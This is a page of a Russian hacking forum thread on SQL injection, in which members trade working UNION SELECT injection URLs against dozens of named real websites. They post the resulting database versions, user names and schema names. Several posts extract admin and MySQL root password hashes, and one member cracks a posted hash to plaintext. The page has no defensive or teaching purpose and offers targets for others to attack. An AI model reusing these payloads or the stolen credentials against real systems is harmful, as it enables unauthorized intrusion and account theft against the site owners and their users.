SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 404 of 798
  1. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    На обеде пробежался....

    Version:5.0.45
    User:malagaca_malagac@localhost
    Database:malagaca_malagacar




    Version:5.0.67-community-log
    User:nutriadv_mihai@localhost
    Database:nutriadv_infoplease




    Version:5.0.67
    User:gavin@localhost
    Database:thelandofgrimney_co_uk_maindb



    Version:5.0.32-Debian_7etch8-log
    User:[email protected]
    Database:tt_TECH_AWARDS
     
    #8061 spherics, 3 Mar 2009
    2 people like this.
  2. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.oil-city.ru/new_detail.php?id=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3--
    Database Version : 4.1.22-standard
    Database name : wd40ru_oil
    User name : wd40ru_oilweb@localhost

    -------------------------------------------------------+


    Code:
    http://www.profshina.ru/index.php?page=9005001&tmpl=7&nbid=1&newsid=-1+union+select+concat_ ws(0x3a,version(),database(),user())--
    Database Version : 4.1.22
    Database name : db_roman056_1
    User name : [email protected]
     
    #8062 f1ng3r, 3 Mar 2009
    1 person likes this.
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.thaigolfer.com/ranges/rangedetail.phtml?id=-999999+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    user():database():version()
    golfer@localhost:golfer:4.0.21-log

    Там есть еще табличка user, но колонок подобрать не смог...
     
    #8063 mailbrush, 3 Mar 2009
    2 people like this.
  4. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.turistka.ru/altai/mail.php?firm=-1%20union%20select%20username,user_password,3,4%20 from%20bb_users%20limit%201,1--
    SAN
    d32f227fabf9c471fcceb0f12d8a626d (Нужно расшифровать с меня +_)
    pr 4
     
    #8064 Assembler, 3 Mar 2009
    3 people like this.
  5. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.tot.biz.ua/ru/news/?cid=32&nid=-1+union+select+1,2,3,4,5,concat _ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
    Database Version : 5.0.75
    Database name : totbiz
    User name : totbizua@localhost

    юзверь:

    Code:
    http://www.tot.biz.ua/ru/news/?cid=32&nid=-1+union+select+1,2,3,4,5,concat _ws(0x3a,login,pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+va cuums_users+limit+0,1--
    Code:
    marina:f1ac4a2e174b0a964a821f3826c35be3

    ----------------------------------------------------------+

    Масло Hado :p

    Code:
    http://www.hado.ru/index.php?we=novosti&wt=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3--
    Database Version : 4.1.22-log
    Database name : www1vclggru_hado
    User name : [email protected]
     
    #8065 f1ng3r, 3 Mar 2009
    1 person likes this.
  6. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Вот сеово небольшой сбор скулей by me :)
    Налетай как говорица :)
    Code:
    http://www.deluthiers.com/es/category.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--
    юзер/версия/бд:

    Code:
    4.1.22-standard:luthier_luthier@localhost:luthier_deluthiers
    -----------------------------------------------------------------

    Code:
    http://www.educationsante.be/es/article.php?id=-1+union+all+select+0,1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7--
    юзер/версия/бд:

    Code:
    5.0.44-log:educatio@localhost:educatio
    ---------------------------------------------------------------

    Code:
    http://www.mammaparliamodidoping.it/post.php?ID=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3--
    юзер/версия/бд:


    Code:
    4.0.25-log:mpdd@localhost:devmpdd
    -----------------------------------------------------------------

    Code:
    http://www.marmaglia.it/post.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7--
    юзер/версия/бд:

    Code:
    4.1.22-standard:marmagli_user@localhost:marmagli_marmaglia
    -------------------------------------------------------------------

    Code:
    http://www.univs.cn/univs/xidian/it/read.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5--
    юзер/версия/бд:

    Code:
    4.0.26-log:xidian@localhost:ucnews
    -------------------------------------------------------------------

    Code:
    http://www.maipiudivisi.it/read.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4--

    юзер/версия/бд:

    Code:
    4.0.11a-gamma:[email protected]:maipiudivisi
    ----------------------------------------------------------------


    Code:
    http://www.laboratorioclinicopedagogico.it/curriculum.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5--

    юзер/версия/бд:

    Code:
    4.0.22-debug:illaboratorio@localhost:laboratorio
    -------------------------------------------------------------------


    Code:
    http://esterproductions.it/curriculum.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database())--
    юзер/версия/бд:

    Code:
    5.0.51a-3ubuntu5.4:ester@localhost:esterproductions_db1
    ----------------------------------------------------------------------


    Code:
    http://www.sptcomo.it/newsDetail.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9--
    юзер/версия/бд:


    Code:
    4.1.22-standard:sptcoit_go38ty71@localhost:sptcoit_sf33tR3
    ----------------------------------------------------------------------


    Code:
    http://www.comune.poirino.to.it/readnews.php?id=-1+union+all+select+0,1,2,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),4,5--
    юзер/версия/бд:

    Code:
    4.1.16-standard-log:[email protected]:031492Nick
    --------------------------------------------------------------------
    The End!
     
    #8066 -m0rgan-, 3 Mar 2009
    4 people like this.
  7. erihtoney

    erihtoney Member

    Joined:
    3 Mar 2009
    Messages:
    91
    Likes Received:
    73
    Reputations:
    20
    Code:
    http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14+--
    Code:
    http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14+--
    Code:
    http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14+--
    version : 4.0.26-log
    user : constant@localhost
    database : constant_ru

    ______________________________

    Code:
    http://www.metalportal.com.ua/gost.php?action=open&id=-3+union+select+1,version()
    Code:
    http://www.metalportal.com.ua/gost.php?action=open&id=-3+union+select+1,user()
    Code:
    http://www.metalportal.com.ua/gost.php?action=open&id=-3+union+select+1,database()
    version : 4.1.22-standard 1
    user : metalpor_metalpo@localhost 1
    database : metalpor_clients 1
    PS: Вывод осуществляется в загаловке страницы

    ______________________________

    Российская национальная горнолыжная школа

    Code:
    http://ski.stel.ru/rus/forage.shtml?id=1+union+select+1,2,concat_ws(0x20203a3a2020,user(),version(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8

    user: arasia@localhost
    version: 4.1.22
    database: skivagi

    ______________________________


    Code:
    http://www.maer-sport.ru/news/index.php?id=-12+union+select+1,2,concat_ws(0x20203a3a2020,user(),version(),database()),4,5/*
    user: maerspo1_sport@localhost
    version: 4.1.22-log
    database: maerspo1_maer

    ______________________________
    Code:
    http://www.srg.com.bs/news.php?id=-5+union+select+1,2,3,4,concat_ws(0x20203a3a2020,user(),version(),database()),6,7,8,9,10,11,12,13&type=news&cmd=display
    user: indigo_admin@localhost
    version: 4.0.23-debug
    database: indigonetworks

    Собственно пассы:
    Code:
    http://www.srg.com.bs/news.php?id=-5+union+select+1,2,3,4,user,password,7,8,9,10,11,12,13+from+mysql.user--&type=news&cmd=display
    root 457265956b0a4b08
    root 67e919553dd7e948
    indigo_admin 1f5f0cb349d22d64
     
    #8067 erihtoney, 3 Mar 2009
    2 people like this.
  8. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    www.drgas.net PR=3


    Code:
    https://www.drgas.net/catalog.php?catid=3+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6--
    version: 4.1.22-max-log
    user: [email protected]
    database: drgas_maindb

    --------------------------------------------------------------


    www.terainvest.com PR=2


    Code:
    http://www.terainvest.com/catalog.php?catid=4+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10--
    version: 4.0.27-log
    user: u2462@localhost
    database: u2462
     
    #8068 S0ulVortex, 3 Mar 2009
    Last edited by a moderator: 4 Mar 2009
    2 people like this.
  9. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://lemonburst.biz/display.php?id=206/**/UNION/**/SELECT/**/1,02,3,4,5,6,7,8,9,10,11,12,13,14/*
    Database Version: 4.1.22
    Database name: stewsk867
    User name: [email protected]

    2 Assembler
    d32f227fabf9c471fcceb0f12d8a626d:sss113
     
    #8069 Rubaka, 3 Mar 2009
    2 people like this.
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://yoky-lib.com/vb.php?id=-1+union+select+1,2,3,4,5,6,7,8,column_name,10+from+information_schema.columns+where+table_name=0xa5e3eba5/*
    там чета про пшп, вб етк..
    5 версия..
     
    _________________________
    #8070 yarbabin, 4 Mar 2009
    3 people like this.
  11. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.autohof.ru/news.php?id=28+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4--
    Database Version : 4.1.20-lk-log
    Database name : authru
    User name : authru@localhost

    Code:
    а дальше не дает SpaceWeb ((( insecure
     
    #8071 f1ng3r, 4 Mar 2009
  12. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://pornkisk.ru/film.php?id=479+union+select+1,2,3,4,version(),6--
    5.0.51a-community
     
    #8072 Calcutta, 4 Mar 2009
    1 person likes this.
  13. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://slipfall.biz/band-member-display.php?id=11+union+select+1,password,username,4,5,6+from+admin/*

    Database Version: 4.0.27-max-log
    Database name: slipfall
    User name: [email protected]

    хз где админка (((((((
     
    #8073 Rubaka, 4 Mar 2009
  14. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    Code:
    http://www.porsche-spb.ru/model.phtml?id=-11+UNION+SELECT+1,2,3,CONCAT(Version(),Database(),User()),5,6,7--
    Database Version: 5.0.77
    Database name: porsche_main
    User name: porsche_main@localhost

    admin:6ac8f89a724b853d
     
    #8074 svesve, 4 Mar 2009
  15. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://solidarnist.com.ua/index.php?mode=news_full&news_id=-1+union+select+1,2,3,4--
    4.1.22-log
     
    #8075 Calcutta, 4 Mar 2009
    1 person likes this.
  16. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.easysexporn.com/view.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--
    :D

    Code:
    http://www.sexyshop.com.ve/articulos.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4--
     
    #8076 Fugitif, 4 Mar 2009
    2 people like this.
  17. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Магазин Порнухи!

    Version: 4.1.21
    User:dvdlist@localhost
    Database:dvdlist_db1

    Не перебирал....
     
    #8077 spherics, 4 Mar 2009
    3 people like this.
  18. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Code:
    _http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3--
    [email protected]

    ------

    Code:
    _http://www.nvha.nl/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--
    [email protected]

    ------

    Code:
    _http://www.trovet.nl/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(version(),user(),database()),6,7--
    [email protected]_data

    -----

    Code:
    _http://www.zeelandwoning.nl/pages.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2--
    [email protected]_joom

    -----

    Code:
    _http://www.spsrasd.info/fr/detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7--
    [email protected]

    -----

    Code:
    _http://www.cmgolf.fr/product.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9--
    [email protected]_7etch6-logmy67521
     
    #8078 I love this game, 4 Mar 2009
    3 people like this.
  19. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.paik.ru/?menu=view&sid=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2--
    Database Version : 4.1.22-log
    Database name : wwwpaikru
    User name : paik@localhost


    ----------------------------------------------+

    Code:
    http://www.sp-vms.com/index.php?id=1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,ve rsion() ,database(),user()),0x71),0x71),3,4,5,6,7--
    Database Version : 4.1.14-max-log
    Database name : sp_vms
    User name : [email protected]
     
    #8079 f1ng3r, 4 Mar 2009
    3 people like this.
  20. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    www.edutech.ch pr-7
    PHP:
    http://www.edutech.ch/lms/ev3/showreport.php?prodid=-121+union+select+1,2,3,4,5,6,concat_ws(0x3A,user(),version(),database()),8,9,10,11,12,13,14--+
    user : nte_edutech@localhost
    version : 5.0.32-Debian_7etch8-log
    database : nte_edutech
     
    #8080 AkyHa_MaTaTa, 4 Mar 2009
    3 people like this.
(You must log in or sign up to post here.)
Page 404 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.